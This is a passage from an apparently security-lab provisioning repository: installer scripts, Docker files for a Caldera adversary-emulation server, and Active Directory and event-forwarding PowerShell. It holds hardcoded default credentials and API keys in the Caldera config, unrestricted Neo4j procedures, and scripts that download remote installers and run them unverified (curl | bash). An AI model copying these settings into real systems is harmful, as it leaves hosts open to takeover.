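# default to empty.
echoerror() {
  printf '%s * ERROR%s: %s\n' "${RC-}" "${EC-}" "$*" 1>&2
}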
15 |
16 | # *********** Script Menu ***************
# Print the option summary and leave with exit status 1. The "Usage:" line is
# written to stderr, every other line to stdout.
usage() {
  printf '%s\n' " "
  echo "Usage: $0 [option...]" >&2
  printf '\n'
  printf '%s\n' " -v run a specific Drupal version" " -h help menu"
  printf '\n'
  printf '%s\n' "Examples:" " $0 -v 8.6.5-debian-9-r14" " "
  exit 1
}
29 |
30 | # ************ Command Options **********************
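# ************ Command Options **********************
# -v <version>  Bitnami drupal branch/image tag to run ("latest" for master)
# -h            usage (exits 1)
while getopts v:h option
do
  case "${option}"
  in
    v) RUN_DRUPAL=$OPTARG;;
    h) usage;;
    \?) usage;;
    : ) echo "Missing option argument for -$OPTARG" >&2; exit 1;;
    * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;;
  esac
done

# OPTIND is still 1 when getopts consumed nothing.
if ((OPTIND == 1))
then
  echo "$ERROR_TAG No options specified"
  usage
fi

# Install Docker and Docker-Compose.
# NOTE(review): the helper is fetched from the master branch, so its content
# is not pinned to a reviewed revision; pin to a commit and verify a digest
# where reproducible, tamper-evident provisioning matters.
if [[ ! -f Install-Docker.sh ]]; then
  if ! wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Docker.sh >> "$LOGFILE" 2>&1; then
    echo "$ERROR_TAG Could not download Install-Docker.sh, see $LOGFILE" >&2
    exit 1
  fi
  chmod +x Install-Docker.sh >> "$LOGFILE" 2>&1
fi
# Stop when the Docker install fails; the docker-compose call at the end would
# otherwise fail later with a less useful error.
if ! ./Install-Docker.sh >> "$LOGFILE" 2>&1; then
  echo "$ERROR_TAG Docker installation failed, see $LOGFILE" >&2
  exit 1
fi

# Check what branch to download
if [[ "$RUN_DRUPAL" == "latest" ]]; then
  git clone https://github.com/bitnami/bitnami-docker-drupal /opt/bitnami-docker-drupal >> "$LOGFILE" 2>&1
else
  # The branch name doubles as the image tag written into docker-compose.yml.
  git clone --branch "$RUN_DRUPAL" https://github.com/bitnami/bitnami-docker-drupal /opt/bitnami-docker-drupal >> "$LOGFILE" 2>&1
  # Update docker-compose.yml file to download the right docker image tag
  sed -i -E "s|image: 'bitnami\/drupal\:.*|image: \'bitnami\/drupal\:$RUN_DRUPAL\'|g" /opt/bitnami-docker-drupal/docker-compose.yml >> "$LOGFILE" 2>&1
fi

# Run docker containers in the background (skipped when the clone failed,
# because cd then fails).
cd /opt/bitnami-docker-drupal && docker-compose -f docker-compose.yml up -d >> "$LOGFILE" 2>&1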
67 |
68 | ## Create SSH Tunnel
69 | # ssh -L 80:127.0.0.1:80 @
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Logstash.sh:
--------------------------------------------------------------------------------
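#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Adds the Elastic 7.x apt repository and installs Logstash. Runs unattended:
# every apt-get call is non-interactive (the original prompted), every
# privileged step goes through sudo consistently (the original mixed plain and
# sudo invocations), and any failing step aborts the script.

set -e
set -o pipefail

sudo apt-get update
sudo apt-get install -y apt-transport-https gnupg

# Download the Elastic signing key into a dedicated keyring and bind it to the
# repository with signed-by, instead of the deprecated apt-key global trust
# store (which would let this key validate every configured repository).
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor --yes -o /usr/share/keyrings/elasticsearch-keyring.gpg

# Write (not append) the repository definition so that repeated runs do not
# leave duplicate entries in /etc/apt/sources.list.d/elastic-7.x.list
echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-7.x.list > /dev/null

# Install Logstash
sudo apt-get update && sudo apt-get install -y logstash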
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-OMS-Auditd-Plugin.sh:
--------------------------------------------------------------------------------
1 | #! /bin/sh
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
# Print the option summary to stdout. $1 is the program name shown on the
# first line. Does not exit; the caller picks the exit status.
usage()
{
  printf '%s\n' \
    "usage: $1 [OPTIONS]" \
    "Options:" \
    " " \
    " --install Install the package from the system." \
    " --upgrade Upgrade the package in the system." \
    " -t tag --tag tag Download bundle script from specific GitHub release tag (i.e v2.4.5-44)." \
    " Latest version is installed by default" \
    " -? | -h | --help shows this usage text."
}
17 |
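# Extract parameters.
# installMode and tagRelease stay unset unless the matching option is given;
# unknown arguments end the script with status 1, --help with status 0.
while [ $# -ne 0 ]
do
  case "$1" in
    --install)
      installMode="--install"
      shift 1
      ;;

    --upgrade)
      installMode="--upgrade"
      shift 1
      ;;
    -t|--tag)
      # A trailing -t with no value made 'shift 2' fail; under bash that
      # leaves $1 unchanged and the loop never terminates. Reject it instead.
      if [ $# -lt 2 ]; then
        echo "Option '$1' requires a release tag argument" >&2
        echo "Use -h or --help for usage" >&2
        exit 1
      fi
      tagRelease=$2
      shift 2
      ;;

    -\? | -h | --help)
      usage "$(basename "$0")" >&2
      exit 0
      ;;

    *)
      echo "Unknown argument: '$1'" >&2
      echo "Use -h or --help for usage" >&2
      exit 1
      ;;
  esac
done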
48 |
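# We need to use sudo for commands in the following block, if not running as root.
# $EUID is a bash-only variable and is empty under /bin/sh (the declared
# interpreter), which made the old test always pick sudo; id -u is POSIX and
# gives the same answer under both shells.
SUDO=''
if [ "$(id -u)" -ne 0 ]; then
  SUDO='sudo'
fi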
54 |
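# Set bundle script to latest GitHub release:
# The API answer is JSON; grep -oP (GNU grep with PCRE) extracts the first
# browser_download_url ending in .sh.
GITHUB_RELEASE_X64=$(curl --silent "https://api.github.com/repos/microsoft/OMS-Auditd-Plugin/releases/latest" | grep -oP '"browser_download_url": "\K(.*.sh)(?=")')
# Output example: https://github.com/microsoft/OMS-Auditd-Plugin/releases/download/v2.4.5-44/auoms-2.4.5-44.universal.x64.sh

# A specific tag overrides the latest release.
if [ -n "$tagRelease" ]; then
  ASSETS_URL=$(curl --silent "https://api.github.com/repos/microsoft/OMS-Auditd-Plugin/releases/tags/$tagRelease" | grep -oP '"assets_url": "\K(.*)(?=")')
  GITHUB_RELEASE_X64=$(curl --silent "$ASSETS_URL" | grep -oP '"browser_download_url": "\K(.*.sh)(?=")')
fi

# An empty URL (API rate limit, unknown tag, no network) used to reach wget as
# 'wget -O "" ""' while the rest of the script kept going; stop here instead.
if [ -z "$GITHUB_RELEASE_X64" ]; then
  echo "Could not resolve the auoms bundle download URL${tagRelease:+ for tag '$tagRelease'}" >&2
  exit 1
fi
BUNDLE_X64=$(basename "$GITHUB_RELEASE_X64")
# Output example: auoms-2.4.5-44.universal.x64.sh

# NOTE(review): the bundle is executed with root privileges straight after
# download without digest or signature verification; check it against a
# published checksum, if the project provides one, before running it where
# the release channel is not fully trusted.
# installMode is deliberately unquoted: when unset it must expand to no argument.
wget -O "${BUNDLE_X64}" "${GITHUB_RELEASE_X64}" && $SUDO sh "./${BUNDLE_X64}" ${installMode} || exit 1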
67 |
68 | # Copying auoms conf and rules
69 | cp syslog.conf /etc/opt/microsoft/auoms/outconf.d/syslog.conf
70 | cp mstic-research.rules /etc/opt/microsoft/auoms/rules.d
71 |
72 | # Enable AUOMS
73 | sed -i -e 's/active = no/active = yes/' /etc/audisp/plugins.d/auoms.conf
74 |
75 | # Enable the auoms service (will start auoms if it is not running)
76 | /opt/microsoft/auoms/bin/auomsctl enable
77 |
78 | # Restaring OMID and AUOMS
79 | systemctl restart omid
80 | systemctl restart auoms
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-PenPot.sh:
--------------------------------------------------------------------------------
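#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)

# *********** log tagging variables ***********
INFO_TAG="[INSTALLATION-INFO]"
ERROR_TAG="[INSTALLATION-ERROR]"

# *********** Set Log File ***************
LOGFILE="/var/log/PenPot-Install.log"

# Print an error line to stderr.
# $@ - the message text.
# RC/EC are colour start/end escapes that this script never assigns, so they
# default to empty here. The message is passed as a %s argument rather than
# spliced into the printf format, so text containing '%' or backslashes is
# printed literally instead of being interpreted as a format directive.
echoerror() {
    printf "${RC:-} * ERROR${EC:-}: %s\n" "$*" 1>&2;
}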
14 |
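# Install Docker and Docker-Compose
# The helper script is fetched from the project's master branch over HTTPS and
# executed unmodified; pin a commit in the URL if the install must be reproducible.
if [[ ! -f Install-Docker.sh ]]; then
    if ! wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Docker.sh >> "$LOGFILE" 2>&1; then
        echoerror "$ERROR_TAG Could not download Install-Docker.sh (see $LOGFILE)"
        exit 1
    fi
    chmod +x Install-Docker.sh >> "$LOGFILE" 2>&1
fi
# Without this check a failed Docker install was silently followed by "docker compose".
if ! ./Install-Docker.sh >> "$LOGFILE" 2>&1; then
    echoerror "$ERROR_TAG Install-Docker.sh failed (see $LOGFILE)"
    exit 1
fi

# Download PenPot Docker Compose File
if [[ ! -f docker-compose.yaml ]]; then
    if ! wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/docker/penpot/docker-compose.yaml >> "$LOGFILE" 2>&1; then
        echoerror "$ERROR_TAG Could not download docker-compose.yaml (see $LOGFILE)"
        exit 1
    fi
fi
# Bring the PenPot stack up detached; compose output goes to the log file.
if ! docker compose -p penpot -f docker-compose.yaml up -d >> "$LOGFILE" 2>&1; then
    echoerror "$ERROR_TAG docker compose up failed (see $LOGFILE)"
    exit 1
fi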
--------------------------------------------------------------------------------
/resources/scripts/bash/install-go-audit.sh:
--------------------------------------------------------------------------------
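#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Installs Go, builds slackhq/go-audit from source, then installs nvm/npm and
# the streamstash forwarder. Remote downloads use curl -f so an HTTP error
# aborts the step instead of piping an error page into tar or bash.

# Set environment variables.
export GOROOT=/usr/local
export GOPATH=/go
export PATH=$GOROOT/bin:$GOPATH/bin:$PATH
export NVM_DIR=/usr/local/nvm

mkdir -p "$NVM_DIR" "$GOPATH/src"

apt-get update -y
apt-get install -y build-essential git jq auditd

# Download Latest Go
# The VERSION endpoint can return more than one line (newer releases add a
# timestamp line); only the first line is the version string.
GO_VERSION=$(curl -fsSL 'https://golang.org/VERSION?m=text' | head -n 1)
if [ -z "$GO_VERSION" ]; then
    echo "Could not determine the latest Go version" >&2
    exit 1
fi
curl -fsSL "https://storage.googleapis.com/golang/${GO_VERSION}.linux-amd64.tar.gz" \
    | tar xvzf - -C /usr/local --strip-components=1 || exit 1

# Install pre-requisities for go-audit
go get -u github.com/kardianos/govendor

# Clone go-audit project into the GOPATH source tree. The original "cd go/src/"
# was relative to the caller's working directory rather than $GOPATH.
cd "$GOPATH/src" || exit 1
git clone https://github.com/slackhq/go-audit.git || exit 1
cd go-audit || exit 1

# Build binary
go build || exit 1

# Copy go-audit yaml
cp go-audit.yaml.example go-audit.yaml
# Copy go-audit binary
cp go-audit /usr/local/bin/

# Download nvm
# The installer is executed straight from the network; pin NVM_VERSION to a
# known release if the host must not depend on the "latest" tag at build time.
NVM_VERSION=$(curl -fsSL https://api.github.com/repos/nvm-sh/nvm/releases/latest | jq -r '.tag_name')
if [ -z "$NVM_VERSION" ] || [ "$NVM_VERSION" = "null" ]; then
    echo "Could not determine the latest nvm release" >&2
    exit 1
fi
curl -fsSL "https://raw.githubusercontent.com/nvm-sh/nvm/${NVM_VERSION}/install.sh" | bash
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"

# Installing latest npm LTS
nvm install --lts
npm install -g https://github.com/nbrownus/streamstash#2.0

# Set Node path
export NODE_PATH="$(npm root -g)"

# Stop Auditd Service
service auditd stop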
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/2.6.6-040520/docker-compose-caldera.yml:
--------------------------------------------------------------------------------
version: '3.5'

services:
  docker-caldera:
    image: cyb3rward0g/docker-caldera:2.6.6-040520
    container_name: docker-caldera
    restart: always
    # Admin credentials come from the shell environment or a .env file next to
    # this compose file; compose substitutes an empty string (with a warning) if unset.
    environment:
      CALDERA_RED_ADMIN_NAME: ${CALDERA_RED_ADMIN_NAME}
      CALDERA_RED_ADMIN_PASSWORD: ${CALDERA_RED_ADMIN_PASSWORD}
    # Published on all host interfaces: 8888 is the server port and 7010/7012
    # the agent contact ports (compare app.contact.* in the caldera local.yml
    # in this repo) — restrict with a host firewall outside a closed lab.
    ports:
      - "8888:8888"
      - "7010:7010/tcp"
      - "7010:7010/udp"
      - "7012:7012"
    networks:
      caldera:

networks:
  caldera:
    driver: bridge
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/Dockerfile:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://github.com/mitre/caldera

# Builds on the project's Caldera base image; USER, HOME and CALDERA_HOME are
# expected to come from that base image (none of them is set in this file).
FROM cyb3rward0g/docker-caldera:0.0.1
LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"
LABEL description="Dockerfile Mordor Caldera"

USER ${USER}

# Add the evals plugin. The clone is unpinned, so every build takes the current
# branch head of the upstream repository.
RUN cd $CALDERA_HOME/plugins \
    #&& git clone https://github.com/d4weiss/evals_caldera.git \
    && git clone https://github.com/mitre-attack/evals_caldera.git

COPY conf/local.yml ${CALDERA_HOME}/conf/local.yml
COPY scripts/caldera-entrypoint.sh ${CALDERA_HOME}/

# Permission fix-up needs root; the image drops back to the unprivileged user below.
USER root

RUN chmod +x ${CALDERA_HOME}/caldera-entrypoint.sh \
    && chown -R ${USER} ${CALDERA_HOME} ${HOME}

WORKDIR ${CALDERA_HOME}
ENTRYPOINT ["./caldera-entrypoint.sh"]
CMD ["python3", "server.py"]

USER ${USER}
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/conf/a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml:
--------------------------------------------------------------------------------
---

# Seed facts for the evals_caldera plugin (the id matches the filename; the old
# compose file in this repo mounts it under plugins/evals_caldera/data/facts).
# The share and file name line up with what New-NetworkShares.ps1 creates
# (C:\secrets\ring.txt on the FILE001 host).
id: a93f6915-a9b8-4a6b-ad46-c072963b32c1
name: evals
facts:
  - property: remote.file.share
    value: \\FILE001\secrets
  - property: remote.file.name
    value: ring.txt
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/conf/local.yml:
--------------------------------------------------------------------------------
# Caldera server configuration baked into the old lab image.
# NOTE(review): api_key_*, encryption_key, crypt_salt and every users: entry
# below are placeholder values committed to source control; crypt_salt is still
# the literal REPLACE_WITH_RANDOM_VALUE. Any server reachable beyond the lab
# network needs its own values.
api_key_blue: BLUEADMIN123
api_key_red: ADMIN123
encryption_key: ADMIN123
app.contact.gist: API_KEY
app.contact.html: /weather
# Contact channels advertised to agents (127.0.0.1 here; the compose files in
# this repo publish the matching container ports).
app.contact.http: http://127.0.0.1:8888
app.contact.tcp: 127.0.0.1:7010
app.contact.udp: 127.0.0.1:7011
app.contact.websocket: 127.0.0.1:7012
crypt_salt: REPLACE_WITH_RANDOM_VALUE
exfil_dir: /tmp
# evals_caldera is the plugin cloned by the old Dockerfile in this directory.
plugins:
  - sandcat
  - mock
  - stockpile
  - response
  - compass
  - caltack
  - ssl
  - atomic
  - gameboard
  - human
  - training
  - access
  - manx
  - evals_caldera
port: 8888
reports_dir: /tmp
# username: password per team
users:
  blue:
    blue: admin
  red:
    admin: admin
    red: admin
--------------------------------------------------------------------------------
/resources/scripts/docker/caldera/old/docker-compose-caldera.yml:
--------------------------------------------------------------------------------
version: '3.5'

services:
  mordor-caldera:
    image: cyb3rward0g/mordor-caldera:0.0.1
    container_name: mordor-caldera
    # NOTE(review): the bind mounts read from ./config/, but the directory in this
    # repo is named conf/ (see old/conf/local.yml) — confirm which path is intended,
    # otherwise compose creates empty directories at these paths.
    volumes:
      - ./config/a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml:/opt/Caldera/plugins/evals_caldera/data/facts/a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml
      - ./config/local.yml:/opt/Caldera/conf/local.yml
    restart: always
    # Published on all host interfaces; 8888 is the server port from local.yml.
    ports:
      - "80:80"
      - "443:443"
      - "8888:8888"
    networks:
      caldera:

networks:
  caldera:
    driver: bridge

--------------------------------------------------------------------------------
/resources/scripts/docker/neo4j/Dockerfile:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)

# Neo4j with the APOC extended plugin baked into the image.
FROM neo4j:5.8.0

# Keep in step with the base image version; APOC releases track Neo4j releases.
ENV APOC_VERSION=5.8.0

# Allow APOC file import/export and let it read the server configuration.
ENV NEO4J_apoc_export_file_enabled=true
ENV NEO4J_apoc_import_file_enabled=true
ENV NEO4J_apoc_import_file_use__neo4j__config=true
ENV NEO4J_PLUGINS=\[\"apoc\"\]
# Takes every apoc.* procedure out of the sandbox. Combined with the file
# import/export flags above, file-system procedures are callable by database
# users — verify this against the role model before exposing the instance.
ENV NEO4J_dbms_security_procedures_unrestricted=apoc.\\\*

# Fetched at build time with no integrity check; pinning the jar's digest
# (ADD --checksum=sha256:<digest> with BuildKit) makes the build reproducible.
ADD https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/${APOC_VERSION}/apoc-${APOC_VERSION}-extended.jar $NEO4J_HOME/plugins/

RUN chmod a+r $NEO4J_HOME/plugins/apoc-${APOC_VERSION}-extended.jar

# Example run. NEO4J_AUTH=none disables authentication entirely, so this form
# is only for a local lab host where both ports stay unreachable from outside:
# docker run -it -d --rm --name neo4j -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=none neo4j-apoc
--------------------------------------------------------------------------------
/resources/scripts/docker/nginx/Dockerfile:
--------------------------------------------------------------------------------
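# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

FROM nginx:1.25.1
LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"

# key=value form; the legacy "ENV key value" spelling is deprecated.
ENV DEBIAN_FRONTEND=noninteractive

# *********** Installing Prerequisites ***************
# -qq : No output except for errors
# One layer for update/install/cleanup so the apt package lists do not remain
# in the image. The original ran "apt-get clean autoremove", and clean does not
# take a subcommand argument, so autoremove most likely never ran.
RUN echo "Updating Ubuntu base image.." \
    && apt-get update -qq \
    && apt-get install -qqy --no-install-recommends curl \
    && apt-get -qy autoremove \
    && apt-get -qy clean \
    && rm -rf /var/lib/apt/lists/*

# *********** Adding files to Container ***************
COPY scripts/nginx-entrypoint.sh /opt/scripts/
RUN chmod +x /opt/scripts/nginx-entrypoint.sh

# *********** RUN Nginx ***************
EXPOSE 80 443
WORKDIR "/opt/scripts/"
ENTRYPOINT ["./nginx-entrypoint.sh"]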
--------------------------------------------------------------------------------
/resources/scripts/docker/nginx/scripts/nginx-entrypoint.sh:
--------------------------------------------------------------------------------
#!/bin/sh

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# SIGTERM handler: announce, stop nginx, and end the entrypoint with status 0.
_term()
{
    echo "Terminating Nginx Services"
    service nginx stop
    exit 0
}
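# Run the handler on SIGTERM (what "docker stop" sends). A shell trap only fires
# between foreground commands, so the log tail below is backgrounded and waited
# on; with tail in the foreground the signal sat until tail exited and the
# container was eventually killed instead of stopping nginx cleanly.
# "TERM" is the POSIX spelling accepted by every /bin/sh.
trap _term TERM

# ************* Creating Certificate ***********
# A fresh self-signed key/certificate pair is generated on every container
# start, so clients see a different certificate after each restart.
openssl req \
    -x509 \
    -nodes \
    -days 365 \
    -newkey rsa:2048 \
    -keyout /etc/ssl/private/Nginx.key \
    -out /etc/ssl/certs/Nginx.crt \
    -subj "/C=US/ST=VA/L=VA/O=Nginx/OU=Ngnix Nginx/CN=Nginx"

echo "Starting remaining services.."
service nginx restart

echo "Pushing Nginx Logs to console.."
tail -f /var/log/nginx/*.log &
wait $!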
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/Create-SecurityGroup.ps1:
--------------------------------------------------------------------------------
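# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:

# Creates a global security group under CN=Users of the given domain.
#   -SecurityGroup : name of the group (also used as its display name and in the description)
#   -domainFQDN    : DNS name of the domain, e.g. corp.example.com
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$SecurityGroup,

    [Parameter(Mandatory=$true)]
    [string]$domainFQDN
)

$ErrorActionPreference = "Stop"

# Build the domain DN from every DNS label. The previous two-variable split only
# handled "name.tld"; with a three-label FQDN the remaining labels landed in one
# element and produced an invalid DN such as "DC=corp,DC=example com".
$ParentPath = "DC=" + ($domainFQDN.Split('.') -join ',DC=')

write-host "Creating Security Group $SecurityGroup on $ParentPath .."
New-ADGroup -Name $SecurityGroup -GroupCategory Security -GroupScope Global `
    -DisplayName "$SecurityGroup" -Path "CN=Users,$ParentPath" `
    -Description "Security group $SecurityGroup" -PassThru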
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/Deploy-Forest.ps1:
--------------------------------------------------------------------------------
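# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://github.com/MicrosoftDocs/windowsserverdocs/blob/master/WindowsServerDocs/identity/ad-ds/deploy/Install-a-New-Windows-Server-2012-Active-Directory-Forest--Level-200-.md
# https://stackoverflow.com/a/4409448
# https://github.com/aws-quickstart/quickstart-microsoft-activedirectory/tree/master/scripts/archive

# Promotes this host to the first domain controller of a new forest.
#   -domainFQDN                    : DNS name of the new root domain
#   -DomainNetBiosName             : NetBIOS name of the new domain
#   -SafeModeAdministratorPassword : DSRM password, as a SecureString
# Refuses to run on a host that is already domain-joined; otherwise installs
# AD DS + DNS, runs Install-ADDSForest and reboots the machine.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$domainFQDN,

    [Parameter(Mandatory=$true)]
    [string]$DomainNetBiosName,

    [Parameter(Mandatory=$true)]
    [SecureString]$SafeModeAdministratorPassword
)

# Create New Forest, add Domain Controller
$host_info = Get-WmiObject win32_computersystem
# Resolved once, up front: the original only assigned $hostname inside the
# "already joined" branch, so the messages in the deployment branch printed an
# empty host name.
$hostname = $host_info.Name

if ($host_info.partofdomain -eq $true)
{
    $domain_name = $host_info.Domain

    write-host -fore red "$hostname is already part of the $domain_name domain"
    write-host -fore red "$hostname cannot be used to create a new forest"
}
else
{
    write-host -fore green "$hostname is not part of a domain yet.."
    write-host -fore green "Deploying a new forest and promoting $hostname to Domain Controller.."

    # Windows Features Installation
    Import-Module ServerManager
    write-host -fore green "Installing Windows features:"
    $windows_features = @("AD-Domain-Services", "DNS")
    foreach ($feature in $windows_features)
    {
        write-host -fore yellow "Installing $feature Windows feature.."
        Install-WindowsFeature -name $feature -IncludeManagementTools
    }

    # Microsoft Windows Server 2016 Standard Evaluation
    # Creating New Forest
    Import-Module ADDSDeployment

    # -NoRebootOnCompletion keeps the promotion from rebooting on its own so the
    # explicit Restart-Computer below is the single reboot point.
    Install-ADDSForest `
        -SafeModeAdministratorPassword $SafeModeAdministratorPassword `
        -CreateDnsDelegation:$false `
        -DatabasePath "C:\Windows\NTDS" `
        -DomainMode "Default" `
        -DomainName $domainFQDN `
        -DomainNetbiosName $DomainNetBiosName `
        -ForestMode "Default" `
        -InstallDns:$true `
        -LogPath "C:\Windows\NTDS" `
        -NoRebootOnCompletion:$true `
        -SysvolPath "C:\Windows\SYSVOL" `
        -Force:$true

    Start-Sleep -Seconds 5
    Restart-Computer -Force
}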
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/New-NetworkShares.ps1:
--------------------------------------------------------------------------------
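# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://ilovepowershell.com/2012/09/19/create-network-share-with-powershell-3/
# https://lotr.fandom.com/wiki/Ring-inscription

# Creates the C:\secrets and C:\gates folders, shares them, and drops the
# ring.txt file that the caldera evals fact file in this repo refers to.
#   -domainFQDN : DNS name of the domain whose groups are granted access
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$domainFQDN
)

$ErrorActionPreference = "Stop"

# The NetBIOS domain name is taken to be the first DNS label of the FQDN
# (e.g. "corp" for corp.example.com) — TODO confirm on domains whose NetBIOS
# name differs from the first label.
$DomainName1 = $domainFQDN.Split('.')[0]

$folders = @("secrets", "gates")

foreach($folder in $folders)
{
    # -Force makes the directory creation idempotent; with $ErrorActionPreference
    # set to Stop, the original New-Item aborted a re-run when the folder existed.
    New-Item -Path "C:\$folder" -ItemType Directory -Force | Out-Null
    if($folder -Like "secrets")
    {
        # Only Domain Admins may reach the secrets share
        New-SMBShare -Name "secrets" -Path "C:\secrets" `
            -FullAccess "$DomainName1\Domain Admins"
    }
    else
    {
        # Domain Users get read access to gates
        New-SMBShare -Name "gates" -Path "C:\gates" `
            -FullAccess "$DomainName1\Domain Admins" `
            -ReadAccess "$DomainName1\Domain Users"
    }
}

# Create secret file
Write-Output "One Ring to rule them all, One ring to find them; One ring to bring them all and in the darkness bind them" > C:\secrets\ring.txt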
--------------------------------------------------------------------------------
/resources/scripts/powershell/active-directory/Set-OUs.ps1:
--------------------------------------------------------------------------------
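# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://www.itprotoday.com/windows-78/create-large-number-ous-set-structure-and-delegation

# Creates the lab's top-level OUs (Workstations, Servers, LogCollectors,
# DomainUsers) directly under the domain, skipping any that already exist.
#   -domainFQDN : DNS name of the domain, e.g. corp.example.com
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$domainFQDN
)

# Verifying ADWS service is running (the AD cmdlets below need it)
$ServiceName = 'ADWS'
$arrService = Get-Service -Name $ServiceName

while ($arrService.Status -ne 'Running')
{
    Start-Service $ServiceName
    write-host $arrService.status
    write-host 'Service starting'
    Start-Sleep -seconds 5
    $arrService.Refresh()
    if ($arrService.Status -eq 'Running')
    {
        Write-Host 'Service is now Running'
    }
}

# Build the domain DN from every DNS label. The previous two-variable split only
# handled "name.tld"; a three-label FQDN produced an invalid DN such as
# "DC=corp,DC=example com".
$ParentPath = "DC=" + ($domainFQDN.Split('.') -join ',DC=')
# (name, description) pairs
$OUS = @(("Workstations","Workstations in the domain"),("Servers","Servers in the domain"),("LogCollectors","Servers collecting event logs"),("DomainUsers","Users in the domain"))

foreach($OU in $OUS)
{
    $ouName, $ouDescription = $OU
    #Check if exists, if it does skip
    [string] $Path = "OU=$ouName,$ParentPath"
    write-host "Checking to see if $Path exists or not"
    if(![adsi]::Exists("LDAP://$Path"))
    {
        write-host "Creating OU $ouName .."
        New-ADOrganizationalUnit -Name $ouName -Path $ParentPath `
            -Description $ouDescription `
            -ProtectedFromAccidentalDeletion $false -PassThru
    }
}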
--------------------------------------------------------------------------------
/resources/scripts/powershell/auditing/Configure-WEF-Client.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://github.com/zulu8/Blue/blob/master/Deploy-Blue.ps1
# https://support.microsoft.com/en-us/help/921468/security-auditing-settings-are-not-applied-to-windows-vista-based-and

# Configures this host as a Windows Event Forwarding client of the given collector:
# enables WinRM, lets the Network Service account read the Security log, and
# points the SubscriptionManager policy at the collector.
#   -domainFQDN     : DNS name of the domain
#   -WECNetBIOSName : host name of the collector; its FQDN is <WECNetBIOSName>.<domainFQDN>
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$domainFQDN,

    [Parameter(Mandatory=$true)]
    [string]$WECNetBIOSName
)

# Enable WinRM if it is not enabled
$ServiceName = 'WinRM'
$arrService = Get-Service -Name $ServiceName

if ($arrService.Status -eq 'Running')
{
    Write-Host "$ServiceName Service is now Running"
}
else
{
    # quickconfig creates the listener and firewall exception; -q suppresses the prompts
    Write-host 'Enabling WinRM..'
    winrm quickconfig -q
    write-Host "Setting WinRM to start automatically.."
    & sc.exe config WinRM start= auto
}

# Grant the Network Service account READ access to the event log by appending (A;;0x1;;;NS)
# The SDDL written here replaces the whole channel ACL: SYSTEM full, Administrators
# read/write, Event Log Readers (S-1-5-32-573) read, and the new Network Service read entry.
write-Host "Granting the Network Service account READ access to the Security event log.."
wevtutil set-log security /ca:'O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)'

# WEC Server
$WECFQDN = $WECNetBIOSName+"."+$domainFQDN

# WEF/WEC Registry Entry
# Subscription manager URL uses the HTTP WinRM listener (5985) with a 60 s refresh.
# NOTE(review): WinRM applies message-level encryption for Kerberos-authenticated
# domain clients — confirm that applies here, or use https/5986 on the collector.
$regKey = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager"
if(!(Test-Path $regKey)){Write-Host $regKey " does not exist.."
    New-Item $regKey -Force
}
Write-Host "Setting " $regKey
New-ItemProperty -Path $regKey -Name 1 -Value "Server=http://$WECFQDN`:5985/wsman/SubscriptionManager/WEC,Refresh=60" -PropertyType "String" -force

# Adding the Network Service to the Event Log Readers group
write-Host "Adding Network Service to Event Log Readers restricted group.."
Add-LocalGroupMember -Group "Event Log Readers" -Member "Network Service"
# net.exe localgroup "Event Log Readers" "Network Service" /add

# Restart so the new SubscriptionManager policy is picked up
Restart-Service WinRM

# Re-query the service object after the restart and wait until it reports Running
$ServiceName = 'WinRM'
$arrService = Get-Service -Name $ServiceName

while ($arrService.Status -ne 'Running')
{
    Start-Service $ServiceName
    write-host $arrService.status
    write-host "$ServiceName Service starting"
    Start-Sleep -seconds 5
    $arrService.Refresh()
